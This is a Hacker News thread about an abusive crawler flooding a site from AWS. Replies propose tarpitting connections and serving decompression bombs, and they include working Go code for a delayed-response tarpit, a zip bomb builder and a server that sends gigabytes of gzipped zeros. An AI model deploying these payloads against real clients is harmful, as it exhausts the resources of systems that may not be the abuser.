
252 points by lgats | 8 comments

I have been struggling with a bot ('Mozilla/5.0 (compatible; crawler)') coming from AWS Singapore that has been sending an absurd number of requests to a domain of mine, averaging over 700 requests/second for several months now. Thankfully, CloudFlare is able to handle the traffic with a simple WAF rule and a 444 response to reduce the outbound traffic.

I've submitted several complaints to AWS to get this traffic to stop; their typical follow-up is: "We have engaged with our customer, and based on this engagement have determined that the reported activity does not require further action from AWS at this time."

I've tried various 4XX responses to see if the bot will back off, and I've tried 30X redirects (which it follows), all to no avail.

The traffic is hitting volumes that require me to renegotiate my contract with CloudFlare, and it is otherwise a nuisance when reviewing analytics/logs.

I've considered redirecting the entirety of the traffic to the AWS abuse report page, but at this scale it's essentially a small DDoS network, and pointing it anywhere could be considered abuse in itself.

Have others had a similar experience?

swiftcoder ◴[] No.45614001[source]
Making the obviously-abusive bot prohibitively expensive is one way to go, if you control the terminating server.

A gzip bomb is good if the bot happens to be vulnerable, but even just slowing down their connection rate is often sufficient: waiting just 10 seconds before responding with your 404 will tie up ~7,000 ports on their box (700 req/s × 10 s of in-flight connections), which should be enough to crash most Linux processes (nginx + mod-http-echo is a really easy way to set this up).
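For illustration, here is a minimal sketch of the same tarpit idea as a standalone Go server rather than the nginx setup mentioned above; the 10-second delay and port 8080 are placeholder assumptions:

  package main

  import (
      "net/http"
      "time"
  )

  func main() {
      http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
          // Hold each connection open; the client must keep a socket
          // (and an ephemeral port) allocated for the full delay.
          time.Sleep(10 * time.Second)
          http.NotFound(w, r) // then answer with a plain 404
      })
      http.ListenAndServe(":8080", nil)
  }

The cost to the server is one mostly-idle connection per request; the cost to the client is a port and socket held for the full ten seconds.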

replies(7): >>45614138 #>>45614240 #>>45614367 #>>45614560 #>>45619426 #>>45623137 #>>45628852 #
mkj ◴[] No.45614367[source]
AWS customers have to pay for outbound traffic. Is there a way to get them to send you (or cloudflare) huge volumes of traffic?
replies(2): >>45614423 #>>45614438 #
_pdp_ ◴[] No.45614438[source]
A KB-sized zip file can expand to gigabytes or petabytes through recursive nesting, though it depends on their implementation.
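As a rough single-layer illustration in Go (file names and sizes here are placeholder assumptions; real recursive bombs nest many such archives inside one another), a run of zeros deflates at roughly 1000:1:

  package main

  import (
      "archive/zip"
      "os"
  )

  // Builds one layer of a zip bomb; error handling omitted for brevity.
  func main() {
      f, _ := os.Create("layer0.zip")
      defer f.Close()

      zw := zip.NewWriter(f)
      w, _ := zw.Create("zeros.bin") // Create compresses with Deflate
      chunk := make([]byte, 1<<20)   // 1 MiB of zeros
      for i := 0; i < 4*1024; i++ {  // 4 GiB in, roughly 4 MiB on disk
          w.Write(chunk)
      }
      zw.Close()
  }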
replies(1): >>45614913 #
1. sim7c00 ◴[] No.45614913[source]
that's traffic in the other direction
replies(1): >>45616545 #
2. swiftcoder ◴[] No.45616545[source]
The main joy of a zip bomb is that it doesn't consume much bandwidth: the transferred compressed file is relatively small, and it only becomes huge when the client tries to decompress it in memory afterwards
replies(1): >>45619421 #
3. crazygringo ◴[] No.45619421[source]
It's still going in the wrong direction.
replies(1): >>45619595 #
4. dns_snek ◴[] No.45619595{3}[source]
It doesn't matter either way. OP was thinking about ways to consume someone's bandwidth. A zip bomb doesn't consume bandwidth, it consumes computing resources of its recipient when they try to unpack it.
replies(2): >>45620056 #>>45625962 #
5. crazygringo ◴[] No.45620056{4}[source]
I know. I was pointing out that it doesn't matter what it consumes if it's going the wrong way to begin with.
6. sim7c00 ◴[] No.45625962{4}[source]
i wouldn't assume someone sending 700 req per second or so to a single domain repeatedly (likely to the same resources) will bother opening zip files.

the bot in the article is likely being tested (as the author noted), or it's a very bad 'stresser'.

if it were grabbing content it would access the site differently (fetch resources once and be on its way).

it's not bad to host zip bombs tho, for the content grabbers :D nomnom.

saw an article on here about a guy who generated arbitrary PNGs or so. also classy haha.

if you have a friendly VPS provider who gives unlimited bandwidth, these options can be fun. you can make a dashboard showing which bot has consumed the most junk.

replies(2): >>45626139 #>>45626681 #
7. ruined ◴[] No.45626139{5}[source]
nearly every HTTP response is gzipped; unpacking it automatically is a default feature of every HTTP client.
8. mjmas ◴[] No.45626681{5}[source]
This uses the built-in compression in HTTP:

  Content-Encoding: gzip
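For the serving side, a minimal Go sketch of delivering a gzip bomb over that mechanism; the 10 GiB target, the port, and the choice of header are illustrative assumptions, not anything from the thread. Zeros compress at roughly 1000:1, so the on-wire payload stays small while any client that honors the header inflates it in memory:

  package main

  import (
      "bytes"
      "compress/gzip"
      "net/http"
  )

  // buildBomb gzips n GiB of zeros; the compressed output is roughly
  // 1000x smaller, so ~10 GiB decompressed costs ~10 MiB on the wire.
  func buildBomb(gib int) []byte {
      var buf bytes.Buffer
      zw := gzip.NewWriter(&buf)
      chunk := make([]byte, 1<<20) // 1 MiB of zeros
      for i := 0; i < gib*1024; i++ {
          zw.Write(chunk)
      }
      zw.Close()
      return buf.Bytes()
  }

  func main() {
      bomb := buildBomb(10) // ~10 GiB once decompressed
      http.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
          // Content-Encoding is the header most clients key off
          // when decompressing a response body automatically.
          w.Header().Set("Content-Encoding", "gzip")
          w.Header().Set("Content-Type", "text/html")
          w.Write(bomb)
      })
      http.ListenAndServe(":8080", nil)
  }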